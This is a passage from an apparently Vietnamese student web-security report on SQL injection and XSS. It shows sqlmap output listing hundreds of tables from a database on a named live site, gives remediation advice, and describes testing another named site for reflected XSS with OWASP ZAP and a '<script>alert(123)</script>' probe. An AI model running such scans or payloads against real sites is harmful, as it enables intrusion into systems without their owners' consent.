[15:02:29] [INFO] retrieved: wiki_filearchive
[15:02:33] [INFO] retrieved: wiki_hitcounter
[15:02:33] [INFO] retrieved: wiki_image
[15:02:34] [INFO] retrieved: wiki_imagelinks
[15:02:34] [INFO] retrieved: wiki_interwiki
[15:02:35] [INFO] retrieved: wiki_ipblocks
[15:02:35] [INFO] retrieved: wiki_iwlinks
[15:02:35] [INFO] retrieved: wiki_job
[15:02:36] [INFO] retrieved: wiki_l10n_cache
[15:02:36] [INFO] retrieved: wiki_langlinks
[15:02:37] [INFO] retrieved: wiki_log_search
[15:02:37] [INFO] retrieved: wiki_logging
[15:02:37] [INFO] retrieved: wiki_module_deps
[15:02:38] [INFO] retrieved: wiki_msg_resource
[15:02:39] [INFO] retrieved: wiki_msg_resource_links
[15:02:39] [INFO] retrieved: wiki_objectcache
[15:02:39] [INFO] retrieved: wiki_oldimage
[15:02:40] [INFO] retrieved: wiki_page
[15:02:40] [INFO] retrieved: wiki_page_props
[15:02:41] [INFO] retrieved: wiki_page_restrictions
[15:02:41] [INFO] retrieved: wiki_pagelinks
[15:02:41] [INFO] retrieved: wiki_protected_titles
[15:02:42] [INFO] retrieved: wiki_querycache
[15:02:42] [INFO] retrieved: wiki_querycache_info
[15:02:43] [INFO] retrieved: wiki_querycachetwo
[15:02:43] [INFO] retrieved: wiki_recentchanges
[15:02:44] [INFO] retrieved: wiki_redirect
[15:02:44] [INFO] retrieved: wiki_revision
[15:02:44] [INFO] retrieved: wiki_searchindex
[15:02:45] [INFO] retrieved: wiki_site_identifiers
[15:02:45] [INFO] retrieved: wiki_site_stats
[15:02:46] [INFO] retrieved: wiki_sites
[15:02:46] [INFO] retrieved: wiki_tag_summary
[15:02:47] [INFO] retrieved: wiki_templatelinks
[15:02:47] [INFO] retrieved: wiki_text
[15:02:47] [INFO] retrieved: wiki_transcache
[15:02:48] [INFO] retrieved: wiki_updatelog
[15:02:48] [INFO] retrieved: wiki_uploadstash
[15:02:49] [INFO] retrieved: wiki_user
[15:02:49] [INFO] retrieved: wiki_user_former_groups
[15:02:50] [INFO] retrieved: wiki_user_groups
[15:02:50] [INFO] retrieved: wiki_user_newtalk
[15:02:50] [INFO] retrieved: wiki_user_properties
[15:02:51] [INFO] retrieved: wiki_valid_tag
[15:02:51] [INFO] retrieved: wiki_watchlist
[15:02:52] [INFO] retrieved: xf_addon
[15:02:53] [INFO] retrieved: xf_admin
[15:02:53] [INFO] retrieved: xf_admin_log
[15:02:53] [INFO] retrieved: xf_admin_navigation
[15:02:54] [INFO] retrieved: xf_admin_permission
[15:02:54] [INFO] retrieved: xf_admin_permission_entry
[15:02:55] [INFO] retrieved: xf_admin_search_type
[15:02:55] [INFO] retrieved: xf_admin_template
[15:02:55] [INFO] retrieved: xf_admin_template_compiled
[15:02:56] [INFO] retrieved: xf_admin_template_include
[15:02:56] [INFO] retrieved: xf_admin_template_modification
[15:02:57] [INFO] retrieved: xf_admin_template_modification_log
[15:02:57] [INFO] retrieved: xf_admin_template_phrase
[15:02:58] [INFO] retrieved: xf_attachment
[15:02:58] [INFO] retrieved: xf_attachment_data
[15:02:59] [INFO] retrieved: xf_attachment_view
[15:02:59] [INFO] retrieved: xf_ban_email
[15:02:59] [INFO] retrieved: xf_bb_code
[15:03:00] [INFO] retrieved: xf_bb_code_media_site
[15:03:00] [INFO] retrieved: xf_bb_code_parse_cache
[15:03:01] [INFO] retrieved: xf_captcha_log
[15:03:01] [INFO] retrieved: xf_captcha_question
[15:03:02] [INFO] retrieved: xf_code_event
[15:03:02] [INFO] retrieved: xf_code_event_listener
[15:03:03] [INFO] retrieved: xf_content_spam_cache
[15:03:03] [INFO] retrieved: xf_content_type
[15:03:03] [INFO] retrieved: xf_content_type_field
[15:03:04] [INFO] retrieved: xf_conversation_master
[15:03:04] [INFO] retrieved: xf_conversation_message
[15:03:05] [INFO] retrieved: xf_conversation_recipient
[15:03:05] [INFO] retrieved: xf_conversation_user
[15:03:06] [INFO] retrieved: xf_cron_entry
[15:03:06] [INFO] retrieved: xf_data_registry
[15:03:07] [INFO] retrieved: xf_deferred
[15:03:07] [INFO] retrieved: xf_deletion_log
[15:03:28] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[15:03:39] [INFO] retrieved: xf_draft
[15:03:39] [INFO] retrieved: xf_edit_history
[15:03:40] [INFO] retrieved: xf_email_template
[15:03:40] [INFO] retrieved: xf_email_template_compiled
[15:03:41] [INFO] retrieved: xf_email_template_modification
[15:03:44] [INFO] retrieved: xf_email_template_modification_log
[15:03:44] [INFO] retrieved: xf_email_template_phrase
[15:03:45] [INFO] retrieved: xf_error_log
[15:03:45] [INFO] retrieved: xf_feed
[15:03:46] [INFO] retrieved: xf_feed_log
[15:03:46] [INFO] retrieved: xf_flood_check
[15:03:47] [INFO] retrieved: xf_forum
[15:03:47] [INFO] retrieved: xf_forum_prefix
[15:03:47] [INFO] retrieved: xf_forum_read
[15:03:48] [INFO] retrieved: xf_forum_watch
[15:03:48] [INFO] retrieved: xf_image_proxy
[15:03:48] [INFO] retrieved: xf_import_log
[15:03:49] [INFO] retrieved: xf_ip
[15:03:49] [INFO] retrieved: xf_ip_match
[15:03:50] [INFO] retrieved: xf_language
[15:03:50] [INFO] retrieved: xf_liked_content
[15:03:51] [INFO] retrieved: xf_link_forum
[15:03:51] [INFO] retrieved: xf_link_proxy
[15:03:51] [INFO] retrieved: xf_login_attempt
[15:03:52] [INFO] retrieved: xf_mail_queue
[15:03:52] [INFO] retrieved: xf_moderation_queue
[15:03:53] [INFO] retrieved: xf_moderator
[15:03:53] [INFO] retrieved: xf_moderator_content
[15:03:54] [INFO] retrieved: xf_moderator_log
[15:03:54] [INFO] retrieved: xf_news_feed
[15:03:54] [INFO] retrieved: xf_node
[15:03:55] [INFO] retrieved: xf_node_type
[15:03:55] [INFO] retrieved: xf_notice
[15:03:56] [INFO] retrieved: xf_notice_dismissed
[15:03:56] [INFO] retrieved: xf_option
[15:03:57] [INFO] retrieved: xf_option_group
[15:03:57] [INFO] retrieved: xf_option_group_relation
[15:03:57] [INFO] retrieved: xf_page
[15:03:58] [INFO] retrieved: xf_permission
[15:03:58] [INFO] retrieved: xf_permission_cache_content
[15:03:59] [INFO] retrieved: xf_permission_combination
[15:03:59] [INFO] retrieved: xf_permission_combination_user_group
[15:03:59] [INFO] retrieved: xf_permission_entry
[15:04:00] [INFO] retrieved: xf_permission_entry_content
[15:04:00] [INFO] retrieved: xf_permission_group
[15:04:01] [INFO] retrieved: xf_permission_interface_group
[15:04:02] [INFO] retrieved: xf_phrase
[15:04:02] [INFO] retrieved: xf_phrase_compiled
[15:04:03] [INFO] retrieved: xf_phrase_map
[15:04:03] [INFO] retrieved: xf_poll
[15:04:03] [INFO] retrieved: xf_poll_response
[15:04:04] [INFO] retrieved: xf_poll_vote
[15:04:04] [INFO] retrieved: xf_post
[15:04:05] [INFO] retrieved: xf_profile_post
[15:04:05] [INFO] retrieved: xf_profile_post_comment
[15:04:06] [INFO] retrieved: xf_registration_spam_cache
[15:04:06] [INFO] retrieved: xf_report
[15:04:06] [INFO] retrieved: xf_report_comment
[15:04:07] [INFO] retrieved: xf_route_filter
[15:04:07] [INFO] retrieved: xf_route_prefix
[15:04:08] [INFO] retrieved: xf_search
[15:04:08] [INFO] retrieved: xf_search_index
[15:04:08] [INFO] retrieved: xf_session
[15:04:09] [INFO] retrieved: xf_session_activity
[15:04:09] [INFO] retrieved: xf_session_admin
[15:04:10] [INFO] retrieved: xf_smilie
[15:04:10] [INFO] retrieved: xf_smilie_category
[15:04:10] [INFO] retrieved: xf_spam_cleaner_log
[15:04:11] [INFO] retrieved: xf_spam_trigger_log
[15:04:11] [INFO] retrieved: xf_stats_daily
[15:04:12] [INFO] retrieved: xf_style
[15:04:12] [INFO] retrieved: xf_style_property
[15:04:13] [INFO] retrieved: xf_style_property_definition
[15:04:13] [INFO] retrieved: xf_style_property_group
[15:04:13] [INFO] retrieved: xf_template
[15:04:14] [INFO] retrieved: xf_template_compiled
[15:04:14] [INFO] retrieved: xf_template_history
[15:04:15] [INFO] retrieved: xf_template_include
[15:04:15] [INFO] retrieved: xf_template_map
[15:04:15] [INFO] retrieved: xf_template_modification
[15:04:16] [INFO] retrieved: xf_template_modification_log
[15:04:16] [INFO] retrieved: xf_template_phrase
[15:04:17] [INFO] retrieved: xf_thread
[15:04:17] [INFO] retrieved: xf_thread_prefix
[15:04:17] [INFO] retrieved: xf_thread_prefix_group
[15:04:18] [INFO] retrieved: xf_thread_read
[15:04:18] [INFO] retrieved: xf_thread_redirect
[15:04:19] [INFO] retrieved: xf_thread_user_post
[15:04:19] [INFO] retrieved: xf_thread_view
[15:04:19] [INFO] retrieved: xf_thread_watch
[15:04:20] [INFO] retrieved: xf_trophy
[15:04:20] [INFO] retrieved: xf_trophy_user_title
[15:04:21] [INFO] retrieved: xf_upgrade_log
[15:04:21] [INFO] retrieved: xf_user
[15:04:21] [INFO] retrieved: xf_user_alert
[15:04:22] [INFO] retrieved: xf_user_alert_optout
[15:04:22] [INFO] retrieved: xf_user_authenticate
[15:04:22] [INFO] retrieved: xf_user_ban
[15:04:23] [INFO] retrieved: xf_user_change_log
[15:04:23] [INFO] retrieved: xf_user_change_temp
[15:04:24] [INFO] retrieved: xf_user_confirmation
[15:04:24] [INFO] retrieved: xf_user_external_auth
[15:04:25] [INFO] retrieved: xf_user_field
[15:04:25] [INFO] retrieved: xf_user_field_value
[15:04:25] [INFO] retrieved: xf_user_follow
[15:04:26] [INFO] retrieved: xf_user_group
[15:04:26] [INFO] retrieved: xf_user_group_change
[15:04:26] [INFO] retrieved: xf_user_group_promotion
[15:04:27] [INFO] retrieved: xf_user_group_promotion_log
[15:04:27] [INFO] retrieved: xf_user_group_relation
[15:04:28] [INFO] retrieved: xf_user_ignored
[15:04:29] [INFO] retrieved: xf_user_news_feed_cache
[15:04:29] [INFO] retrieved: xf_user_option
[15:04:30] [INFO] retrieved: xf_user_privacy
[15:04:30] [INFO] retrieved: xf_user_profile
[15:04:30] [INFO] retrieved: xf_user_status
[15:04:31] [INFO] retrieved: xf_user_trophy
[15:04:31] [INFO] retrieved: xf_user_upgrade
[15:04:32] [INFO] retrieved: xf_user_upgrade_active
[15:04:32] [INFO] retrieved: xf_user_upgrade_expired
[15:04:32] [INFO] retrieved: xf_user_upgrade_log
[15:04:33] [INFO] retrieved: xf_warning
[15:04:33] [INFO] retrieved: xf_warning_action
[15:04:34] [INFO] retrieved: xf_warning_action_trigger
[15:04:34] [INFO] retrieved: xf_warning_definition
[15:04:34] [INFO] retrieved: zf_agencys
[15:04:35] [INFO] retrieved: zf_apps
[15:04:35] [INFO] retrieved: zf_categorys
[15:04:36] [INFO] retrieved: zf_comments
[15:04:36] [INFO] retrieved: zf_config
[15:04:37] [INFO] retrieved: zf_contacts
[15:04:37] [INFO] retrieved: zf_customer
[15:04:38] [INFO] retrieved: zf_dealers
[15:04:41] [INFO] retrieved: zf_event
[15:04:42] [INFO] retrieved: zf_groups
[15:04:42] [INFO] retrieved: zf_orders
[15:04:43] [INFO] retrieved: zf_payment
[15:04:43] [INFO] retrieved: zf_payment
[15:04:43] [INFO] retrieved: zf_permissions
[15:04:43] [INFO] retrieved: zf_posters
[15:04:44] [INFO] retrieved: zf_products
[15:04:44] [INFO] retrieved: zf_province
[15:04:45] [INFO] retrieved: zf_receipt
[15:04:45] [INFO] retrieved: zf_source
[15:04:45] [INFO] retrieved: zf_users
Database: annguyen_web
[589 tables]
+--------------------------------------------------+
| user |
| account |
| agency |
| agent |
| app_detail |
| av_address |
| av_attribute |
| av_attribute_display |
| av_attribute_group |
| av_category |
| av_category_description |
| av_category_to_manufacturer |
| av_chome |
| av_chome_description |
| av_cinformation |
| av_cinformation_description |
| av_cnews |
| av_cnews_description |
| av_color |
| av_country |
| av_coupon |
| av_coupon_description |
| av_coupon_product |
| av_csupport |
| av_csupport_description |
| av_currency |
| av_customer |
| av_customer_group |
| av_download |
| av_download_description |
| av_extension |
| av_geo_zone |
| av_history |
| av_information |
| av_information_description |
| av_language |
| av_lp_dunehd |
| av_lp_order |
| av_manufacturer |
| av_manufacturer_description |
| av_measurement_class |
| av_measurement_rule |
| av_news |
| av_news_description |
| av_news_to_cnews |
| av_newsletter |
| av_order |
| av_order_history |
| av_order_option |
| av_order_product |
| av_order_status |
| av_order_total |
| av_phanloai |
| av_phanloai_info |
| av_phanloai_to_category |
| av_product |
| av_product_attribute |
| av_product_description |
| av_product_discount |
| av_product_image |
| av_product_option |
| av_product_option_description |
| av_product_option_value |
| av_product_option_value_description |
| av_product_phukien |
| av_product_related |
| av_product_search_phanloai |
| av_product_special |
| av_product_to_category |
| av_product_to_chome |
| av_product_to_download |
| av_product_to_phanloai |
| av_product_video |
| av_redirect_url |
| av_review |
| av_setting |
| av_showroom |
| av_slideshow |
| av_slideshow_description |
| av_stock_status |
| av_support |
| av_support_description |
| av_tax_class |
| av_tax_rate |
| av_url_alias |
| av_user |
| av_user_group |
| av_weight_rule |
| av_zone |
| av_zone_to_geo_zone |
| category_app |
| chitietsanpham |
| counter |
| daily |
| danhgia |
| deals_address |
| deals_affiliate |
| deals_affiliate_transaction |
| deals_attribute |
| deals_attribute_description |
| deals_attribute_group |
| deals_attribute_group_description |
| deals_banner |
| deals_banner_image |
| deals_banner_image_description |
| deals_category |
| deals_category_description |
| deals_category_to_layout |
| deals_category_to_store |
| deals_country |
| deals_coupon |
| deals_coupon_history |
| deals_coupon_product |
| deals_currency |
| deals_customer |
| deals_customer_group |
| deals_customer_ip |
| deals_customer_ip_blacklist |
| deals_customer_reward |
| deals_customer_transaction |
| deals_download |
| deals_download_description |
| deals_extension |
| deals_geo_zone |
| deals_information |
| deals_information_description |
| deals_information_to_layout |
| deals_information_to_store |
| deals_language |
| deals_layout |
| deals_layout_route |
| deals_length_class |
| deals_length_class_description |
| deals_manufacturer |
| deals_manufacturer_to_store |
| deals_option |
| deals_option_description |
| deals_option_value |
| deals_option_value_description |
| deals_order |
| deals_order_download |
| deals_order_fraud |
| deals_order_history |
| deals_order_option |
| deals_order_product |
| deals_order_status |
| deals_order_total |
| deals_order_voucher |
| deals_product |
| deals_product_attribute |
| deals_product_description |
| deals_product_discount |
| deals_product_image |
| deals_product_option |
| deals_product_option_value |
| deals_product_related |
| deals_product_reward |
| deals_product_special |
| deals_product_tag |
| deals_product_to_category |
| deals_product_to_download |
| deals_product_to_layout |
| deals_product_to_store |
| deals_return |
| deals_return_action |
| deals_return_history |
| deals_return_reason |
| deals_return_status |
| deals_review |
| deals_setting |
| deals_stock_status |
| deals_store |
| deals_tax_class |
| deals_tax_rate |
| deals_tax_rate_to_customer_group |
| deals_tax_rule |
| deals_url_alias |
| deals_user |
| deals_user_group |
| deals_voucher |
| deals_voucher_history |
| deals_voucher_theme |
| deals_voucher_theme_description |
| deals_weight_class |
| deals_weight_class_description |
| deals_zone |
| deals_zone_to_geo_zone |
| dl_commentmeta |
| dl_comments |
| dl_links |
| dl_options |
| dl_postmeta |
| dl_posts |
| dl_term_relationships |
| dl_term_taxonomy |
| dl_terms |
| dl_usermeta |
| dl_users |
| dl_woocommerce_attribute_taxonomies |
| dl_woocommerce_downloadable_product_permissions |
| dl_woocommerce_order_itemmeta |
| dl_woocommerce_order_items |
| dl_woocommerce_tax_rate_locations |
| dl_woocommerce_tax_rates |
| dl_woocommerce_termmeta |
| doitac |
| dondathang |
| dondathang102 |
| dt_commentmeta |
| dt_comments |
| dt_layerslider |
| dt_links |
| dt_lockdowns |
| dt_login_fails |
| dt_options |
| dt_postmeta |
| dt_posts |
| dt_revslider_css |
| dt_revslider_layer_animations |
| dt_revslider_settings |
| dt_revslider_sliders |
| dt_revslider_slides |
| dt_term_relationships |
| dt_term_taxonomy |
| dt_terms |
| dt_usermeta |
| dt_users |
| dt_yarpp_related_cache |
| event |
| faq |
| faq_xtreamer |
| hlz_commentmeta |
| hlz_comments |
| hlz_crumina_slider |
| hlz_layerslider |
| hlz_links |
| hlz_options |
| hlz_postmeta |
| hlz_posts |
| hlz_revslider_settings |
| hlz_revslider_sliders |
| hlz_revslider_slides |
| hlz_term_relationships |
| hlz_term_taxonomy |
| hlz_terms |
| hlz_usermeta |
| hlz_users |
| hlz_woocommerce_attribute_taxonomies |
| hlz_woocommerce_downloadable_product_permissions |
| hlz_woocommerce_order_itemmeta |
| hlz_woocommerce_order_items |
| hlz_woocommerce_tax_rate_locations |
| hlz_woocommerce_tax_rates |
| hlz_woocommerce_termmeta |
| item |
| jos_banner |
| jos_bannerclient |
| jos_bannertrack |
| jos_c1_danhmuc |
| jos_c1_file |
| jos_c1_language |
| jos_c1_property |
| jos_c1_sanpham |
| jos_categories |
| jos_components |
| jos_contact_details |
| jos_content |
| jos_content_frontpage |
| jos_content_rating |
| jos_core_acl_aro |
| jos_core_acl_aro_groups |
| jos_core_acl_aro_map |
| jos_core_acl_aro_sections |
| jos_core_acl_groups_aro_map |
| jos_core_log_items |
| jos_core_log_searches |
| jos_dbcache |
| jos_groups |
| jos_jce_groups |
| jos_jce_plugins |
| jos_jf_content |
| jos_jf_tableinfo |
| jos_languages |
| jos_menu |
| jos_menu_types |
| jos_messages |
| jos_messages_cfg |
| jos_migration_backlinks |
| jos_modules |
| jos_modules_menu |
| jos_newsfeeds |
| jos_plugins |
| jos_poll_data |
| jos_poll_date |
| jos_poll_menu |
| jos_polls |
| jos_sections |
| jos_session |
| jos_stats_agents |
| jos_templates_menu |
| jos_users |
| jos_v1_danhmuc |
| jos_v1_sanpham |
| jos_weblinks |
| khuyenmai |
| khuyenmai_new |
| lienhe |
| loaisp |
| lp_dunehd |
| point |
| popcorn410 |
| profile |
| qa_blobs |
| qa_cache |
| qa_categories |
| qa_categorymetas |
| qa_contentwords |
| qa_cookies |
| qa_iplimits |
| qa_messages |
| qa_options |
| qa_pages |
| qa_postmetas |
| qa_posts |
| qa_posttags |
| qa_sharedevents |
| qa_tagmetas |
| qa_tagwords |
| qa_titlewords |
| qa_userevents |
| qa_userfavorites |
| qa_userfields |
| qa_userlevels |
| qa_userlimits |
| qa_userlogins |
| qa_usermetas |
| qa_usernotices |
| qa_userpoints |
| qa_userprofile |
| qa_users |
| qa_uservotes |
| qa_widgets |
| qa_words |
| shopsanpham |
| softcommentmeta |
| softcomments |
| softlinks |
| softoptions |
| softpostmeta |
| softposts |
| softterm_relationships |
| softterm_taxonomy |
| softterms |
| softusermeta |
| softusers |
| sukien |
| tintuc |
| tintuc_new |
| ungdung |
| users |
| wiki_archive |
| wiki_category |
| wiki_categorylinks |
| wiki_change_tag |
| wiki_externallinks |
| wiki_filearchive |
| wiki_hitcounter |
| wiki_image |
| wiki_imagelinks |
| wiki_interwiki |
| wiki_ipblocks |
| wiki_iwlinks |
| wiki_job |
| wiki_l10n_cache |
| wiki_langlinks |
| wiki_log_search |
| wiki_logging |
| wiki_module_deps |
| wiki_msg_resource |
| wiki_msg_resource_links |
| wiki_objectcache |
| wiki_oldimage |
| wiki_page |
| wiki_page_props |
| wiki_page_restrictions |
| wiki_pagelinks |
| wiki_protected_titles |
| wiki_querycache |
| wiki_querycache_info |
| wiki_querycachetwo |
| wiki_recentchanges |
| wiki_redirect |
| wiki_revision |
| wiki_searchindex |
| wiki_site_identifiers |
| wiki_site_stats |
| wiki_sites |
| wiki_tag_summary |
| wiki_templatelinks |
| wiki_text |
| wiki_transcache |
| wiki_updatelog |
| wiki_uploadstash |
| wiki_user |
| wiki_user_former_groups |
| wiki_user_groups |
| wiki_user_newtalk |
| wiki_user_properties |
| wiki_valid_tag |
| wiki_watchlist |
| xf_addon |
| xf_admin |
| xf_admin_log |
| xf_admin_navigation |
| xf_admin_permission |
| xf_admin_permission_entry |
| xf_admin_search_type |
| xf_admin_template |
| xf_admin_template_compiled |
| xf_admin_template_include |
| xf_admin_template_modification |
| xf_admin_template_modification_log |
| xf_admin_template_phrase |
| xf_attachment |
| xf_attachment_data |
| xf_attachment_view |
| xf_ban_email |
| xf_bb_code |
| xf_bb_code_media_site |
| xf_bb_code_parse_cache |
| xf_captcha_log |
| xf_captcha_question |
| xf_code_event |
| xf_code_event_listener |
| xf_content_spam_cache |
| xf_content_type |
| xf_content_type_field |
| xf_conversation_master |
| xf_conversation_message |
| xf_conversation_recipient |
| xf_conversation_user |
| xf_cron_entry |
| xf_data_registry |
| xf_deferred |
| xf_deletion_log |
| xf_draft |
| xf_edit_history |
| xf_email_template |
| xf_email_template_compiled |
| xf_email_template_modification |
| xf_email_template_modification_log |
| xf_email_template_phrase |
| xf_error_log |
| xf_feed |
| xf_feed_log |
| xf_flood_check |
| xf_forum |
| xf_forum_prefix |
| xf_forum_read |
| xf_forum_watch |
| xf_image_proxy |
| xf_import_log |
| xf_ip |
| xf_ip_match |
| xf_language |
| xf_liked_content |
| xf_link_forum |
| xf_link_proxy |
| xf_login_attempt |
| xf_mail_queue |
| xf_moderation_queue |
| xf_moderator |
| xf_moderator_content |
| xf_moderator_log |
| xf_news_feed |
| xf_node |
| xf_node_type |
| xf_notice |
| xf_notice_dismissed |
| xf_option |
| xf_option_group |
| xf_option_group_relation |
| xf_page |
| xf_permission |
| xf_permission_cache_content |
| xf_permission_combination |
| xf_permission_combination_user_group |
| xf_permission_entry |
| xf_permission_entry_content |
| xf_permission_group |
| xf_permission_interface_group |
| xf_phrase |
| xf_phrase_compiled |
| xf_phrase_map |
| xf_poll |
| xf_poll_response |
| xf_poll_vote |
| xf_post |
| xf_profile_post |
| xf_profile_post_comment |
| xf_registration_spam_cache |
| xf_report |
| xf_report_comment |
| xf_route_filter |
| xf_route_prefix |
| xf_search |
| xf_search_index |
| xf_session |
| xf_session_activity |
| xf_session_admin |
| xf_smilie |
| xf_smilie_category |
| xf_spam_cleaner_log |
| xf_spam_trigger_log |
| xf_stats_daily |
| xf_style |
| xf_style_property |
| xf_style_property_definition |
| xf_style_property_group |
| xf_template |
| xf_template_compiled |
| xf_template_history |
| xf_template_include |
| xf_template_map |
| xf_template_modification |
| xf_template_modification_log |
| xf_template_phrase |
| xf_thread |
| xf_thread_prefix |
| xf_thread_prefix_group |
| xf_thread_read |
| xf_thread_redirect |
| xf_thread_user_post |
| xf_thread_view |
| xf_thread_watch |
| xf_trophy |
| xf_trophy_user_title |
| xf_upgrade_log |
| xf_user |
| xf_user_alert |
| xf_user_alert_optout |
| xf_user_authenticate |
| xf_user_ban |
| xf_user_change_log |
| xf_user_change_temp |
| xf_user_confirmation |
| xf_user_external_auth |
| xf_user_field |
| xf_user_field_value |
| xf_user_follow |
| xf_user_group |
| xf_user_group_change |
| xf_user_group_promotion |
| xf_user_group_promotion_log |
| xf_user_group_relation |
| xf_user_ignored |
| xf_user_news_feed_cache |
| xf_user_option |
| xf_user_privacy |
| xf_user_profile |
| xf_user_status |
| xf_user_trophy |
| xf_user_upgrade |
| xf_user_upgrade_active |
| xf_user_upgrade_expired |
| xf_user_upgrade_log |
| xf_warning |
| xf_warning_action |
| xf_warning_action_trigger |
| xf_warning_definition |
| zf_agencys |
| zf_apps |
| zf_categorys |
| zf_comments |
| zf_config |
| zf_contacts |
| zf_customer |
| zf_dealers |
| zf_event |
| zf_groups |
| zf_orders |
| zf_payment |
| zf_permissions |
| zf_posters |
| zf_products |
| zf_province |
| zf_receipt |
| zf_source |
| zf_users |
+--------------------------------------------------+
[15:04:46] [WARNING] HTTP error codes detected during run:
502 (Bad Gateway) - 1 times
[15:04:46] [INFO] fetched data logged to text files under '/root/.sqlmap/output/annguyenco.com'
[*] shutting down at 15:04:46
3.2. Hướng giải quyết
Để phòng tránh các nguy cơ có thể xảy ra, hãy bảo vệ các câu truy vấn SQL bằng cách kiểm soát chặt
chẽ tất cả các dữ liệu nhập nhận được từ đối tượng Request (Request, Request. QueryString,
Request.Form, Request. Cookies, và Request.Server Variables).
Cần loại bỏ bất kì thông tin kĩ thuật nào chứa trong thông điệp trả về (response) cho người dùng khi ứng
dụng có lỗi. Các thông báo lỗi thông thường tiết lộ các chi tiết kĩ thuật có thể cho phép kẻ tấn công biết
được điểm yếu của hệ thống.
Xây dựng bộ lọc dữ liệu an toàn cho ứng dụng web, giúp website ngăn chặn được những dữ liệu đầu
vào có khả năng gây hại cho hệ thống.
Kiểm soát chặt chẽ và giới hạn quyền xử lý dữ liệu của tài khoản người dùng, nhất là dữ liệu nhạy cảm
và các tài khoản có quyền admin, chỉnh sửa trực tiếp thông qua ứng dụng web.
II. Kỹ thuật tấn công Cross-site Scripting - XSS
1. Tìm hiểu về XSS
Cross-site Scripting (XSS) là một trong lỗi phổ biến nhất trong ứng dụng web, theo thống kê năm 2013 có đến
26% website bị lỗi này.
Tấn công XSS xảy ra khi một kẻ tấn công sử dụng một ứng dụng web để gửi mã độc hại, thường là script trong
form của một trình duyệt web, cho một người dùng cuối khác. Lỗ hổng cho phép các cuộc tấn công thành công
là khá phổ biến và xảy ra bất cứ nơi nào trong một ứng dụng web sử dụng input từ output một người dùng nó
tạo ra mà không cần phê chuẩn hay mã hóa.
Tấn công XSS có thể được thực hiện bằng cách sử dụng HTML, JavaScript, VBScript, ActiveX, Flash, và các ngôn ngữ client-site khác. Những cuộc tấn công cũng có khả năng thu thập dữ liệu từ tài khoản ăn cắp, thay đổi các thiết lập người dùng, trộm cookie, hoặc có thể quảng cáo lừa đảo. Trong một số trường hợp, các lỗ hổng XSS có thể thực hiện các chức năng khác như quét khác các lỗ hổng và thực hiện một từ tấn công DOS trên server của bạn.
2. Kiểm tra lỗi XSS
2.1. Mục đích: kiểm tra website có bị lỗi XSS hay không. Qua đó giúp chủ sở hữu có giải pháp nhằm xây
dựng website an toàn hơn cho người dùng.
2.2. Phạm vi: dự án chỉ kiểm tra để tìm ra lỗi của website, cam kết giữ bí mật và không sử dụng kết quả cho
mục đích xấu, không tiến hành khai thác lỗ hổng của website.
2.3. Kế hoạcht: hực hiện kiểm tra từ 6/10/2015 đến 23/10/2015
2.4. Mục tiêu: website có địa chỉ http://www.vietnamfoodstuff.com
2.5. Hạn chế: chưa kiểm tra được việc thực hiện đánh cắp cookie hoặc các hành động khác sau khi biết
website tồn tại lỗi XSS.
2.6. Tóm tắt những phát hiện: phát hiện lỗi thông qua việc nhập thông tin trong phần “Contact form”
2.7. Tóm tắt cách giải quyết: người thiết kế web cần quản lý chặt chẽ việc nhập liệu của người dùng, người
dùng cần cảnh giác với những url có chứa script…
3. Cách phát hiện và giải quết
26%
6%
13%
16%
8%
16%
5%
5%3%
2%
Top 10 web application vulnerability 2013
Cross-site Sripting
SQL Injection
Authentication & Authorization
Session Management
CSRF
Info Leakage
Web server version
Remote code execution
Web server configuration
Unauthorized directory access
3.1. Cách phát hiện
Phát hiện bằng cách thủ công hoặc sử dụng công cụ OWASP ZAP để hỗ trợ tìm lỗ hổng trong ứng dụng
web, trong trường hợp này công cụ được cài đặt hệ điều hành Kali-linux 2.0 chạy trên máy ảo VMware
Workstation 12 Player.
1. Sử dụng công cụ OWASP ZAP, chúng ta nhập địa chỉ website (http://xxx.abc) vào để quét lỗi. Sau
khi quét xong, chúng ta sẽ thấy trong thư mục Alerts có phần thông báo lỗi Cross-site Scripting.
Trong trường hợp này, website bị lỗi XSS dạng Reflected.
2. Với cách kiểm tra thủ công, trong website cần kiểm tra, ta cần tìm form đăng nhập hoặc tìm kiếm
trong website. Trong trường hợp này đó là các ô điền thông tin trong phần “Contact”.
Chúng ta nhập đoạn script sau vào ô trống sau đó nhấn enter để kiểm tra: <script>alert(123)</script>
Website sẽ trả về một thông báo với nội dung trong đoạn script mà ta đã nhập: “123”. Vậy là website
tồn tại lỗi XSS.
3.2. Hướng giải quyết
Giống như SQL Injection, bản chất của lỗi XSS là không kiểm soát kỹ dữ liệu nhập đầu vào, vì thế biện pháp
hiệu quả nhất là kiểm tra kỹ dữ liệu nhập vào từ người dùng, chặn các từ khóa nguy hiểm, chỉ chấp nhận
những dữ liệu hợp lệ.
Người dùng có thể thực hiện các bước ngăn chặn đê không trở thành nạn nhân của XSS bằng cách cài đặt cac tiên ich trình duyệt hoăc sử dụng các bộ lọc XSS để ngăn chặn việc thực hiện các script. Ví dụ, các tiện ích bao gồm NoScript cho FireFox; NotScripts cho Chrome và Opera trong khi IE 8 có các add-ons này từ trước.
Related Documents
